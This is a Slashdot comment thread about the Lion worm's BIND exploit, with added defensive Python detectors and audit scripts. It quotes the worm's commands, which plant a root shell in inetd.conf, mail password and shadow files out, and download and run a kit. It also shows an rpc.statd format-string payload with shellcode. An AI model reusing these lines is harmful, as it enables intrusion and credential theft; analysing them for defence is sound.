New Linux Worm
mspeedie writes "Seems Linux has very much arrived, judging by the number of nasty viruses starting to pop up. Check out the latest at:
Lion Worm Virus on Linux
" This is not a virus, its a worm that exploits a vulnerable bind to install a rootkit. Regardless, you should have tripwire or something running anyway.
The worm installs a Linux root kit.
my watch?
You know what's funny? I never have to run my NT services with admin privileges.
Most of the NT problems out there "should be fixed by the admin" as well and slashdot still goes apeshit over them.
"Seems Linux has very much arrive [sic] judging by the number of nasty virus starting to pop up.." Suprisingly, no slashdot pieces on outlook macro viruses began with "Further testifying to the fact that superior user-friendliness has led to its enthusiastic widespread adoption, microsoft outlook was subject to.." Spin, Zealots, Spin! Linux: the next mac.
Every time that a new worm or virus for email is mentioned about a Windows (type) OS this site goes crazy about reporting it and making little jokes about the inherent insecurity built into those systems... well, for a change we finally get the same problem on a Linux system! But, what does slashdot do about it? They say that "Regardless, you should have tripwire or something running anyway. " You mean to tell me that Linux is inherently insecure in its BIND implementation and that we need yet another tool to protect it? Next time an Outlook virus comes out... I expect them to say "Regardless, you should have McAfee running anyways." This type of journalism where excuses are made for Linux and other operating systems are harassed is highly unprofessional. Down with bigotry!
And if you got rootkitted, how the hell are you going to know that? Unless you keep ps on a floppy?
Did anyone else notice that a virus/worm in an MS product is "such a bad product" but when there's a virus/worm in Linux, it's "Linux is arriving!" and "it's the user's fault anyway".
Could somebody de-worm my GNU
Thanks
For me, djbdns has never ever core dumped and updates its secondaries with no problem. It has also never had a security hole, for what it's worth.
Try the support mailing list.
Unless you don't really care, in that case, neither do I.
Well, djbdns isn't really Free. I can't patch it, add some security holes, and redistribute it as the original, like I can with BIND.
That is not 100% correct. See http://cr.yp.to/distributors.html. The only restriction is on redistribution of djbdns. These restrictions are not to make himself rich (if anything, he will lose money on djbdns). The restrictions are so that djbdns stays useful, functional and compatible across all platforms.
Tripwire? If you were a real admin you would look at the source for BIND, declare it garbage, and run djbdns instead.
Run BIND on production servers? Not if my life depended on it. djbdns runs chroot()'d, non-root by default and even then the author still puts up a $500 reward for anyone who can find a security hole.
I'm so glad we modern admins have a choice. djbdns is a real, safe, fast, and well documented alternative to BIND and if I were your boss I'd fire you for not switching.
Friends don't let friends run BIND!
Doesn't mean you don't have to pay for it.
"Hot lesbian witches! It's fucking genius!"
BIND isn't as nearly widespread amongst Linux installations as Outhouse is among WinDOS users. BIND simply isn't one of those apps that "everyone has to have" in order to "be compatible".
Besides, unless this worm is taking advantage of some Linux specific exploit: it could just as easily target any other Unix, or even Cygwin.
A Pirate and a Puritan look the same on a balance sheet.
Apache does run as its own UID, if you set it up right. It has for some years now and quite likely has done so since it was created.
These days, it does NOT require a PhD in computer science to ensure that your Linux box does not become a cracker's paradise.
Simple heuristics like:
"if you don't know what it is, turn it off"
and
"deny by default security policies"
go quite a long way when it comes to avoiding these things. Embedded firewalls are cheap and shiny happy firewall configuration tools are robust and plentiful.
OTOH, CmdrTaco's "arrogant remarks" can just as easily be directed at distributors.
Quite:
A real sysadmin would either have the service disabled or simply make it inaccessible to the common script kiddie. Quite a lot can be done with server security without incurring unacceptable service outages.
Except there is this 'arcane' little command in Bughat called "setup". It quite safely allows the end user to disable things they don't understand. It also provides balloon help to guide the novice along.
As with any issue of quality, the ultimate burden is on the consumer. They must be willing to inform themselves and then make informed choices. This is no less true for Windows vs. Linux as it is for Redhat vs. Mandrake.
Actually, who claimed it was?
Do you even know of anyone that's been infested? Have YOU been infested? Has your company been?
So? How well does Jagged Alliance 2 run on your FreeBSD installation?
No, this is a distributor problem. BIND is not a particularly core part of Linux (or Unix in general). It just happens to be an application that some people find useful.
Whether or not BIND is an exploit depends on a 3rd party developer. Whether or not it's even running depends on who PACKAGED your version of Linux.
OTOH, you have NO CHOICE when it comes to WinDOS distributions. If Microsoft f*cks up, you have no where else to look. If Bughat f*cks up, you can look to Caldera, Mandrake, Debian, Slackware and Suse.
Well... You should be running Anti-Virus software.
:-)
That's why you fix your vulnerabilities as they are discovered.
We should try to fix our vulnerabilities before they are discovered.
Er...
__
__
Men with no respect for life must never be allowed to control the ultimate instruments of death.
GW Bu
The actual virus in this case is bind, and it has to be eradicated....
Well... ok, DJBDNS is _different_, different if you are familiar with the usual ./configure; make; make install installs. But... ever installed bind from the sources? Oh well.
It's simultaneously a Linux problem and a bind problem. It uses binaries compiled for Linux/i386 that attack vulnerable versions of the bind nameserver.
Mason, Buildkernel and more: http://www.stearns.org/
Maybe it's just coincidence, but last night, I had a very weird syslog event while I was pulling down email off my (Northpoint :-) ) DSL line. Copied below is a (very badly formatted) octal dump of the relevant section of the log:
________ : :
0000000 M a r 2 3 0 1 : 5 3 : 2 7
0000020 w a l k i e s - - M A R K
0000040 - - \n M a r 2 3 0 1 : 5 4
0000060 0 4 w a l k i e s i d e n t
0000100 d [ 1 2 2 8 6 ] : s t a r t e
0000120 d \n M a r 2 3 0 1 : 5 4 : 0
0000140 7 w a l k i e s \n M a r 2
0000160 3 0 1 : 5 4 : 0 7 w a l k i
0000200 e s s y s l o g d : C a n n
0000220 o t g l u e m e s s a g e
0000240 p a r t s t o g e t h e r \n M
0000260 a r 2 3 0 1 : 5 4 : 0 7 w
0000300 a l k i e s 1 7 3 > M a r 2
0000320 3 0 1 : 5 4 : 0 7 / s b i n
0000340 / r p c . s t a t d [ 1 6 4 ]
0000360 g e t h o s t b y n a m e e
0000400 r r o r f o r ^ X 367 377 277 ^ X
0000420 367 377 277 ^ Y 367 377 277 ^ Y 367 377 277 ^ Z 367
0000440 377 277 ^ Z 367 377 277 ^ [ 367 377 277 ^ [ 367 377
0000460 277 % 8 x % 8 x % 8 x % 8 x % 8 x
0000500 % 8 x % 8 x % 8 x % 8 x % 2 3 6
0000520 x % n % 1 3 7 x % n % 1 0 x % n
0000540 % 1 9 2 x % n 220 220 220 220 220 220 220 220 220
0000560 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220
*
0002160 220 220 220 1 300 353 | Y 211 A ^ P 211 A ^ H
0002200 376 300 211 A ^ D 211 303 376 300 211 ^ A 260 f 315
0002220 200 263 ^ B 211 Y ^ L 306 A ^ N 231 306 A ^
0002240 H ^ P 211 I ^ D 200 A ^ D ^ L 210 ^ A
0002260 260 f 315 200 263 ^ D 260 f 315 200 263 ^ E 0 300
0002300 210 A ^ D 260 f 315 \n M a r 2 3 0
0002320 1 : 5 4 : 0 7 w a l k i e s
0002340 307 ^ F / b i n 307 F ^ D / s h A 0
0002360 300 210 F ^ G 211 v ^ L 215 V ^ P 215 N ^
0002400 L 211 363 260 ^ K 315 200 260 ^ A 315 200 350 177 377
0002420 377 377 \n
0002423
________
Did someone try to h4x0r my laptop?
Schwab
Editor, A1-AAA AmeriCaptions
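Added here as an illustration (my code, not part of Schwab's post or of any tool mentioned on this page): the logged record above has the shape of a format-string attack on rpc.statd, which logged attacker-controlled text through a printf-style call. The tell-tales are a row of %8x directives to walk up the stack, %<width>x%n pairs to write chosen byte values through pointers planted in the buffer, a long run of 0x90 NOP bytes and a "/bin/sh" string in the trailer. The script scores raw syslog records for those features. The sample records are constructed to mirror the dump; the thresholds are my own assumptions.

```python
import re

NOP = 0x90
MIN_NOP_RUN = 16          # assumption: no hostname contains a sled this long

# Directives of a classic glibc format-string payload. %n stores the number of
# bytes written so far through a pointer taken from the stack; the preceding
# %<width>x directives walk up to that pointer and set the value %n will write.
PCT_N = re.compile(rb"%\d*[hl]*n")
PCT_X = re.compile(rb"%\d*[xX]")


def longest_nop_run(data: bytes) -> int:
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == NOP else 0
        best = max(best, cur)
    return best


def analyze_record(raw: bytes) -> dict:
    """Score one raw syslog record. Work on bytes, not str: the interesting
    part of the line is binary and would be mangled by decoding."""
    pct_n = len(PCT_N.findall(raw))
    pct_x = len(PCT_X.findall(raw))
    nop_run = longest_nop_run(raw)
    shell = b"/bin/sh" in raw
    return {
        "pct_n": pct_n,
        "pct_x": pct_x,
        "nop_run": nop_run,
        "shell_string": shell,
        # either the write primitive is present, or a sled plus a shell string
        "format_string_attack": (pct_n >= 1 and pct_x >= 4) or (nop_run >= MIN_NOP_RUN and shell),
    }


def flagged_records(log: bytes) -> list:
    """Return the records in a raw syslog blob that look like exploit attempts."""
    return [rec for rec in log.split(b"\n") if rec and analyze_record(rec)["format_string_attack"]]


# Constructed samples, modelled on the octal dump in the post above.
SAFE = b"Mar 23 01:54:07 walkies /sbin/rpc.statd[164]: gethostbyname error for nfs1.example.net"
PAYLOAD = (
    b"\x18\xf7\xff\xbf" * 2 + b"\x19\xf7\xff\xbf" * 2 + b"\x1a\xf7\xff\xbf" * 2   # planted addresses
    + b"%8x" * 9                                                               # stack walk
    + b"%236x%n%137x%n%10x%n%192x%n"                                           # four %n writes
    + b"\x90" * 64                                                             # NOP sled
    + b"\x31\xc0\xeb\x7c\x59\x89\x41\x10" + b"/bin/sh\x00"                     # shellcode stub
)
ATTACK = b"Mar 23 01:54:07 walkies /sbin/rpc.statd[164]: gethostbyname error for " + PAYLOAD

if __name__ == "__main__":
    for rec in (SAFE, ATTACK):
        print(analyze_record(rec))
```

The bug class behind such a record is a daemon passing untrusted text as the format argument (syslog(LOG_ERR, buf) in C); the fix is syslog(LOG_ERR, "%s", buf). Note that this is a different vector from the BIND TSIG overflow the Lion worm uses, so a statd probe in the log is a separate attacker or tool, not the worm.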
Actually the particular rootkit in question doesn't replace pstools. I found a trojaned stock RH 6.2 machine at work, and the worm was trying to replicate itself. It was running "hack.sh" and "scan.sh". A little after that I found the rootkit in /dev/.lib
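As an added example (mine, not code from the page, from tripwire or from the worm): a minimal integrity baseline of the kind tripwire keeps, plus a check for what the post above describes, a hidden stash under /dev. It builds the baseline in a scratch directory, simulates the trojaning, and verifies, so it runs offline; the file names and the fake trojaned ps are constructed, and the /dev heuristic is an assumption that needs a human to review its output.

```python
import hashlib
import os
import stat
import tempfile


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths):
    """Record digest, permission bits, owner and size of each regular file that
    exists. Do this once from a known-clean system and keep the result offline:
    a baseline stored on the rooted box can be edited along with everything else."""
    base = {}
    for p in paths:
        try:
            st = os.lstat(p)
        except FileNotFoundError:
            continue
        if stat.S_ISREG(st.st_mode):
            base[p] = (sha256_of(p), stat.S_IMODE(st.st_mode), st.st_uid, st.st_size)
    return base


def verify_baseline(base):
    """Return {path: reason} for every entry that no longer matches."""
    problems = {}
    for p, (digest, mode, uid, size) in base.items():
        try:
            st = os.lstat(p)
        except FileNotFoundError:
            problems[p] = "missing"
            continue
        if not stat.S_ISREG(st.st_mode):
            problems[p] = "replaced by a non-regular file"
        elif sha256_of(p) != digest:
            problems[p] = "content changed"
        elif stat.S_IMODE(st.st_mode) != mode or st.st_uid != uid:
            problems[p] = "mode or owner changed"
    return problems


def odd_dev_entries(devdir="/dev"):
    """/dev should hold device nodes, symlinks and a few directories. Dot-named
    entries and regular files do not belong there; the kit in the post above
    sat in /dev/.lib. Expect a few false positives on newer systems."""
    odd = []
    for name in os.listdir(devdir):
        full = os.path.join(devdir, name)
        st = os.lstat(full)
        if name.startswith(".") or stat.S_ISREG(st.st_mode):
            odd.append(full)
    return sorted(odd)


def self_test() -> dict:
    """Exercise the checks on a constructed scratch tree, never a live system."""
    with tempfile.TemporaryDirectory() as root:
        bin_dir = os.path.join(root, "bin")
        dev_dir = os.path.join(root, "dev")
        os.mkdir(bin_dir)
        os.mkdir(dev_dir)
        ps, ls = os.path.join(bin_dir, "ps"), os.path.join(bin_dir, "ls")
        for p in (ps, ls):
            with open(p, "wb") as f:
                f.write(b"#!/bin/sh\nexec /usr/bin/" + os.path.basename(p).encode() + b' "$@"\n')
        os.symlink("null", os.path.join(dev_dir, "stdin"))   # legitimate-looking entry
        base = build_baseline([ps, ls, os.path.join(bin_dir, "netstat")])  # netstat absent

        # Simulate the intrusion: trojan ps to hide the worm, drop a kit under dev/.lib
        with open(ps, "wb") as f:
            f.write(b"#!/bin/sh\nexec /usr/bin/ps \"$@\" | grep -v 1i0n\n")
        os.mkdir(os.path.join(dev_dir, ".lib"))

        return {
            "baseline_size": len(base),
            "problems": {os.path.basename(k): v for k, v in verify_baseline(base).items()},
            "odd_dev": [os.path.basename(p) for p in odd_dev_entries(dev_dir)],
        }


if __name__ == "__main__":
    print(self_test())
```

Run the real checks with binaries from clean media (the "ps on a floppy" point made earlier in the thread), since a rootkit that replaces ls or the hashing tool itself will hide from a check run with the host's own binaries.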
Right. And I suppose you're going to sit there and claim that you're never hypocritical or apply double standards. If you do, you just proved my point.
-"Zow"
It depends on whether it's modifying a word that immediately follows it, as in "That is an anal-retentive poster," or if it is used alone, as in "The poster is anal retentive."
:-)
--Joe(PS. As long as the CoS folks are around, I figure anything that's OT might as well be OT3...)
--
Program Intellivision!
Of the latest releases of software that you have on your system, or pay someone to do it for you. Not to say that because someone does this it is right to use such a worm, but since we are in a world where these things exist you have to be wary.
This statement is really indicative of another thing: cluelessness. Running tripwire will tell someone that they have been cracked! Close the barn door Edith, the cows just escaped!
Maybe the "or something" alludes to the real solution; don't run BIND, run an up-to-date patched version of BIND, run snort, etc... Maybe he should have said, "Patch early, patch often." But nooooo! Run tripwire.
BTW, this worm is really no different than the ramen worm; similar concept, different exploit. What has gotten the attention of sysadmins is that they are seeing a sudden surge in traffic to port 53. These sysadmins are the target audience of SANS, and the sysadmins don't like someone messing with their DNS. I believe that is why the Global Incident Analysis Center (GIAC) of SANS changed their current threat level to yellow. This comment was posted on GIAC (note TCP, not UDP to port 53).
BTW, the n.g. comp.os.linux.security had a posting about this (didn't know it was lion) back on Tuesday. In that thread, the guy that got cracked found this (using strings on the rogue program)
echo '1008 stream tcp nowait root /bin/sh sh' >> /etc/inetd.conf
/etc/passwd >> 1i0n
/etc/shadow >> 1i0n
/.bash_history
killall -HUP inetd;ifconfig -a > 1i0n
cat
cat
mail 1i0nip@china.com < 1i0n rm -fr 1i0n
rm -fr
lynx -dump http://XXXXXXXX.XX.net/crew.tgz >1i0n.tgz
tar -zxvf 1i0n.tgz
rm -fr 1i0n.tgz;cd lib
./1i0n.sh
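Added example, not from the post above nor from the worm: the first line of that strings dump appends a root shell bound to TCP port 1008 to /etc/inetd.conf and HUPs inetd, so one concrete response check is to audit inetd.conf for entries whose effective server program is a shell or interpreter, or whose service is a bare port number rather than a name from /etc/services. The sample configuration is constructed (stock-looking lines plus the worm's addition); the interpreter list and severity rules are my assumptions.

```python
import os

# Programs that have no business being an inetd server (assumption: extend to taste)
INTERPRETERS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh", "perl", "python"}
WRAPPERS = {"tcpd"}   # tcp_wrappers: the real server is the first argument


def parse_inetd(text: str):
    """Yield one dict per active entry:
    service socktype proto wait[.max] user[.group] server [args...]"""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            yield {"line": lineno, "raw": raw, "error": "too few fields"}
            continue
        service, socktype, proto, wait, user, server = fields[:6]
        args = fields[6:]
        program = server
        if os.path.basename(server) in WRAPPERS and args:
            program = args[0]           # "/usr/sbin/tcpd in.ftpd -l" really runs in.ftpd
        yield {
            "line": lineno,
            "raw": raw,
            "service": service,
            "proto": proto,
            "user": user.split(".")[0].split(":")[0],   # strip any group suffix
            "program": program,
        }


def audit_inetd(text: str):
    """Return [(lineno, severity, reason)] for entries that deserve a second look."""
    findings = []
    for e in parse_inetd(text):
        if "error" in e:
            findings.append((e["line"], "warn", e["error"]))
            continue
        shell = os.path.basename(e["program"]) in INTERPRETERS
        numeric = e["service"].isdigit()
        if not (shell or numeric):
            continue
        reasons = []
        if shell:
            reasons.append("server program is a shell/interpreter")
        if numeric:
            reasons.append("service given as a raw port number")
        severity = "critical" if shell and e["user"] == "root" else "warn"
        findings.append((e["line"], severity, "; ".join(reasons)))
    return findings


# Constructed inetd.conf: a few stock-style entries plus the line the worm appends.
SAMPLE_INETD = "\n".join([
    "# /etc/inetd.conf (constructed sample)",
    "ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a",
    "telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd",
    "finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd",
    "#shell  stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd",
    "1008 stream tcp nowait root /bin/sh sh",
]) + "\n"

if __name__ == "__main__":
    for lineno, severity, reason in audit_inetd(SAMPLE_INETD):
        print(f"line {lineno} [{severity}]: {reason}")
```

A hit from this audit is confirmation, not the cleanup: the same script mails /etc/passwd and /etc/shadow off the box, so every password on it is compromised, and the rest of the kit arrives by HTTP, so the host needs a rebuild from clean media rather than a deleted line.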
I can tell YOU'VE never had a real job as a Sysadmin in a real shop.
--
Your Servant, B. Baggins
I can't believe ALL of you are speaking english as a second language ... the word is
BRAKES
--
I've finally had it: until slashdot gets article moderation, I am not coming back.
> Outlook automatically executes the virus for you using a built-in scripter that has full access to your system. How is Linux crappier than that?
The fact that the user has to click on a lengthy warning dialog to execute ILOVEYOU, which amounts to nothing more than a shell script (a WSH script, specifically).
Lion can be installed remotely without your ever knowing it, using a tool that ships with almost every Linux distro. But that's the admin's fault -- for running Linux.
--
Linux vs. NT aside, if you were/are following anything even vaguely resembling reasonable security policy, you would already be protected. For example, if you're running RedHat 6.2, and signed up for their security mailing list, you should have upgraded to a new version that fixes this hole two months ago.
All of the NT exploits that have been getting the attention lately are old holes that were not patched by SysAdmins. The combination of keeping current patches and an IDS is like an alarm and a "Club" on your car: It won't stop an attack, but it makes other targets look easier.
-- Spring: Forces, coiled again!
The traffic you saw was likely the scanner portion looking for new victims. It randomly scans "class B" address blocks looking for new targets.
Paul
http://www.pauldrobertson.com
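Added example (mine, not from Paul's post or from the worm): the traffic surge SANS noticed is a small number of sources sending SYNs to TCP port 53 at many hosts, which is what a scanner walking a "class B" block looks like from the target's side. Normal resolvers use UDP/53, and TCP/53 to a handful of hosts is ordinary (zone transfers, truncated answers), so the signature is one source opening TCP/53 to many distinct targets. The script groups SYN-only hits on TCP/53 by source from netfilter-style log lines, constructed here, and reports sources over a threshold; the field names follow the kernel's LOG target format, the threshold is an assumption.

```python
import ipaddress
import re
from collections import defaultdict

FIELD_RE = re.compile(r"SRC=(?P<src>\S+)\s+DST=(?P<dst>\S+).*?PROTO=(?P<proto>\S+)(?:.*?\bDPT=(?P<dpt>\d+))?")
FLAG_RE = re.compile(r"\b(SYN|ACK|FIN|RST|PSH|URG)\b")


def parse_log_line(line: str):
    """Pull the fields we need out of one netfilter LOG record; None if it is not one."""
    m = FIELD_RE.search(line)
    if not m:
        return None
    flags = set(FLAG_RE.findall(line))
    return {
        "src": m.group("src"),
        "dst": m.group("dst"),
        "proto": m.group("proto"),
        "dpt": int(m.group("dpt")) if m.group("dpt") else None,
        "syn_only": flags == {"SYN"},      # first packet of a connection attempt
    }


def find_tcp53_scanners(lines, min_targets=8):
    """Map source -> stats for sources that opened TCP/53 to at least min_targets hosts."""
    targets = defaultdict(set)
    for line in lines:
        rec = parse_log_line(line)
        if rec and rec["proto"] == "TCP" and rec["dpt"] == 53 and rec["syn_only"]:
            targets[rec["src"]].add(rec["dst"])
    report = {}
    for src, dsts in targets.items():
        if len(dsts) >= min_targets:
            # how many /16 blocks the targets span: a sweep of one block stays at 1
            blocks = {ipaddress.ip_network(f"{d}/16", strict=False) for d in dsts}
            report[src] = {"targets": len(dsts), "slash16_blocks": len(blocks)}
    return report


def sample_log():
    """Constructed log: one scanner sweeping part of a /16, plus ordinary DNS traffic."""
    fmt = ("Mar 23 02:10:{sec:02d} gw kernel: IN=eth0 OUT= SRC={src} DST={dst} LEN=60 TTL=51 "
           "PROTO={proto} SPT={spt} DPT={dpt} {tail}")
    lines = []
    for i in range(1, 13):      # scanner: 12 distinct hosts, all inside 192.0.0.0/16
        lines.append(fmt.format(sec=i, src="203.0.113.9", dst=f"192.0.2.{i}", proto="TCP",
                                spt=3000 + i, dpt=53, tail="WINDOW=32120 RES=0x00 SYN URGP=0"))
    for i in range(1, 6):       # a resolver doing normal UDP lookups against our name server
        lines.append(fmt.format(sec=20 + i, src="198.51.100.5", dst="192.0.2.53", proto="UDP",
                                spt=1024 + i, dpt=53, tail="LEN=40"))
    # a secondary pulling a zone over TCP, and the reply leg of that session
    lines.append(fmt.format(sec=30, src="198.51.100.7", dst="192.0.2.53", proto="TCP",
                            spt=2049, dpt=53, tail="WINDOW=5840 RES=0x00 SYN URGP=0"))
    lines.append(fmt.format(sec=31, src="192.0.2.53", dst="198.51.100.7", proto="TCP",
                            spt=53, dpt=2049, tail="WINDOW=5792 RES=0x00 ACK SYN URGP=0"))
    return lines


if __name__ == "__main__":
    for src, stats in find_tcp53_scanners(sample_log()).items():
        print(src, stats)
```

The threshold is deliberately per source rather than per packet: a secondary retrying a zone transfer against one master will generate many SYNs to a single target and stays below it.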
It would appear from a quick analysis that only the initial infection vector gets the rootkit. I've only gotten a bit of the way through the initial code, but it looks like the secondary infections all happen without the rootkit. I haven't run it yet to see for sure, but my current conjecture is that the huge blob of code is only used on the initial vector and the smaller bit is what gets replicated to each victim.
Paul
http://www.pauldrobertson.com
Sorry, it would appear that it's not a trojan, quick analysis seems to indicate that the trojaned piece isn't replicated with each subsequent infection. It's a worm, with the wormy piece coming from an HTTP server in China during the BIND exploit phase (via lynx.)
FWIW: There are more and more real viruses happening in the Windows world now that Win32's better understood by the bad guys.
Paul
http://www.pauldrobertson.com
If you don't *HAVE* to run ftpd, *don't* run it. Most especially don't run wu-ftpd. FTP is a bad protocol and every implementation I can think of has had problems, some more than others. Use a reasonably up to date HTTP server, and access control it if you allow HTTP upload. Throw on SSL and client-side certificates if you want something stronger. If you *have* to run FTP, you need to be updating it every time there's a new release (just like BIND.) A lot of us gave up on sendmail a long time ago and went to more secure mailers, http://www.postfix.org or http://www.qmail.org will make your box really zing mail out and both were written to be secure from the start. Sendmail's been pretty stable for a while now though, so it's not the concern it used to be.
As far as alerts go for public-facing services, generally you're better off following when the vendor/project team has released an update rather than trying to follow the mishmash of alerts, posts and filter the useful info out.
Paul
http://www.pauldrobertson.com
Actually, mainframes didn't get those sorts of attributes until the 70's AIR, DOS on the 360 certainly didn't have per-job file attributes, since it was a batch system.
If you want compartmentalization, ACLs, a privacy model, malcode capabilities, etc., then go to http://www.rsbac.org, patch your kernel and stop bitching.
Default configuration: Make your own distribution or script to turn everything on the way you like it. Neither is very difficult, and fixing is more productive than bitching.
Back to the task at hand- RSBAC could have stopped this worm, it's about time it went into a development kernel.
Paul
http://www.pauldrobertson.com
You're wrong. Viruses don't necessarily have to have malicious payloads to be viral, they simply have to infect files and spread themselves that way. Worms infect machines and spread themselves that way- once again no malicious payload required. After giving itself root access, it searches for *other machines* to exploit, and keeps doing that ad infinitum. That's what makes it a worm.
http://www.tuxedo.org/~esr/jargon/html/entry/worm.html
http://www.tuxedo.org/~esr/jargon/html/entry/virus.html
As far as malicious code, it's actually pretty boring, there are at least two examples of the exploit the worm uses to propagate, but it's definitely a worm and it appears to be in the wild.
Paul
http://www.pauldrobertson.com
Sorry, I read "that's" as "it's"- too much time disassembling :(
It is useful to note that we're getting more executable Win32 viruses now though (as opposed to scripts and macros- which are still pervasive but were pretty much all that was coming out for a while.) Our malcode guys have been predicting that for a while though. What worries me is the ELF file infector stuff. Thank goodness we haven't reached critical mass for Linux binaries yet, as there's still time to build in protection.
Paul
http://www.pauldrobertson.com
There isn't a definitive list, but there are around two dozen. The real problem with a list is that most AV companies are concerned about wild viruses, and worms, and so far that list is 2 long, ramen and 1i0n. I don't think the number of Outlook targeted things that are ITW, and most of those seem to be worms. This worm proves that bash is just as good as WSH for worms. If you look at the shell script stuff in 1i0n, you'll see that it's not all that impressive and pretty simple. Viral code seems to be a little trickier, but not majorly so compared to say Win32 viral code targeted at NT. What is difficult is getting traction with one, worms that exploit buffer overruns in common services seem to be the only things with a chance of gaining enough traction to become a problem. Sooner or later that'll change, but for now it's enough to know that basic sysadmin skills should keep you safe.
Paul
http://www.pauldrobertson.com
The default Unix permissions model was designed for a specific purpose. It's worth pointing out that only a subset of IBM Mainframe OS' had the capabilities you describe- for instance, VM never had it. I've had RACF special and Class A-Z in VM, and I've run mainframes on everything from DOS (not the PC kind) up. Unix, originally designed for minicomputers, has grown to usage models well beyond its original purpose, which is why some Unixes have added ACLs (some a number of years ago) and compartments and other security features (Trusted Solaris, CMW, etc.)
Not everyone needs those (unlike brakes on a car), and just like a manual transmission, not everyone can operate one, so for Linux it's optional.
Sorry if you're used to fast food, some of us enjoy ordering quality food item-by-item to get the best meal, not just the same old Happy Meal.
If you want it enough, you'll install it, if you don't, then you don't have to. If you want to wait for someone to create a turnkey distribution you can do that too. Just don't whine like a little baby that someone else isn't doing everything for you.
Actually, the quality bar has been set to "if it doesn't do it out of the box, generally someone's put a hell of a lot of work into doing it and is willing to share it and support it if you take one step in their direction." That's a hell of a lot better than "If it doesn't do it out of the box, wait until the vendor decides to release a bug-ridden version of it and if they don't want to, then you don't get that."
Hold your breath waiting for MAC-based compartments in WindowsANYTHING, or anything else that looks sufficiently B-level to provide strong security.
You might like bloated "it's all in there no matter if it's necessary or not" software systems, but they're not conducive to security and it's best when security-minded people build security critical pieces of them instead of OS-minded people, so patching for RSBAC works very well for those of us who care about security that deeply. It also makes the code easier to check when it's diffs instead of intermingled with the base kernel code.
If you buy a 2 seater sports car, don't expect it to be good at off-roading. The power of Linux is in the fact that I can get anything from RSBAC security to high-powered general purpose clusters and run the same code on them all.
If you need a silly little box around the software to make you happy, then you shouldn't be looking at Linux, it's not about inside the box.
Back on topic: RSBAC actually solves the "I don't want the administrator to be able to trojan this machine" problem as well as is possible on general purpose hardware (you can go download the international patches if you want to add another layer- or I suppose you could pay someone to do it since you seem to be allergic to actually installing software- must be hell when those new Reader Rabbit things come out!) The only other systems that come close cost tens of thousands of dollars and/or are obsolete.
Must have really pained you to choose which options you wanted on your car, or are you just walking until someone figures out how to have leather and cloth seats at the same time?
Paul
http://www.pauldrobertson.com
It is a worm. This is *exactly* that: if the larger of the two 1i0n packages gets executed on a machine, it plants a bunch of trojans and goes searching for new machines which have port 53 open. If it finds them open, it exploits them to download the smaller 1i0n code which then leaves one backdoor (no trojans) and goes looking for machines that listen on port 53...
It does *not* appear to rootkit downstream infected machines, but it *does* move itself to other computers, which is what makes it a worm. Auto-exploit code is only a component of a worm if it automatically transfers itself to new machines. This code does that, therefore it's a worm.
Replication if it infected "normal" programs would make it a virus, replication like this makes it a worm. Take away the self-replication and it's an exploit. All of these terms are well-defined, well-known and well-understood in the security and malcode communities.
In this case, the *worm* is the entire kit, and the exploit is a GLIBC 2.0 based executable called "bind" that's utilized by the worm to propagate via the TSIG overflow in BIND 8.2.x where x<3-REL.
"That system is left alone" is patently false in this case, since the downstream machine loads the smaller worm code and starts infecting machines of its own.
I dunno what you think a worm is, but the rest of
the community is sure that this is a worm. It's a boring worm, but it's definitely a worm.
Paul
http://www.pauldrobertson.com
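Added example (mine, not from Paul's post, from BIND or from the worm): given the version boundary stated above (8.2.x before 8.2.3-REL, which includes the 8.2.3-T* test releases), the quickest triage across a fleet is to ask each name server for its chaos-class version.bind record and classify the answer. The functions below parse the answer line out of dig output, old and new styles, and classify a BIND 8 version string; anything outside the 8.2 branch is reported as "unknown" rather than guessed at. The dig transcripts are constructed.

```python
import re

# Answer line of `dig @server version.bind chaos txt`, old and new dig output styles:
#   VERSION.BIND.   0S CHAOS TXT  "8.2.2-P5"
#   version.bind.   0  CH    TXT  "9.18.1"
ANSWER_RE = re.compile(r'version\.bind\.\s+\S+\s+(?:CH|CHAOS)\s+TXT\s+"([^"]*)"', re.IGNORECASE)
BIND_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z0-9]+))?$")


def version_from_dig(output: str):
    """Version string from the chaos-class answer, or None (refused, no answer section)."""
    m = ANSWER_RE.search(output)
    return m.group(1) if m else None


def tsig_status(version: str) -> str:
    """Classify a BIND version against the 8.2.x TSIG overflow: everything in the
    8.2 branch before 8.2.3-REL is affected, including the 8.2.3-T* betas.
    Other branches return 'unknown'; check their own advisories."""
    m = BIND_VERSION_RE.match(version.strip())
    if not m:
        return "unknown"
    major, minor = int(m.group(1)), int(m.group(2))
    patch = int(m.group(3) or 0)             # "8.2" with no third component
    tag = (m.group(4) or "").upper()
    if major != 8 or minor < 2:
        return "unknown"
    if minor > 2:
        return "fixed"                       # 8.3.x and later postdate the fix
    if patch < 3:
        return "vulnerable"                  # 8.2, 8.2.1, 8.2.2-P1 .. P7
    if patch == 3 and tag.startswith("T"):
        return "vulnerable"                  # 8.2.3-T1A .. T9B test releases
    return "fixed"                           # 8.2.3-REL, 8.2.4, ...


def assess(dig_output: str) -> dict:
    v = version_from_dig(dig_output)
    return {"version": v, "status": tsig_status(v) if v else "unknown"}


# Constructed dig transcripts (answer section only).
DIG_OLD = ';; ANSWER SECTION:\nVERSION.BIND.   0S CHAOS TXT  "8.2.2-P5"\n'
DIG_FIXED = ';; ANSWER SECTION:\nversion.bind.   0  CH  TXT  "8.2.3-REL"\n'
DIG_HIDDEN = ';; ANSWER SECTION:\nversion.bind.   0  CH  TXT  "not telling"\n'
DIG_REFUSED = ";; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 4711\n"

if __name__ == "__main__":
    for name, out in (("old", DIG_OLD), ("fixed", DIG_FIXED), ("hidden", DIG_HIDDEN), ("refused", DIG_REFUSED)):
        print(name, assess(out))
```

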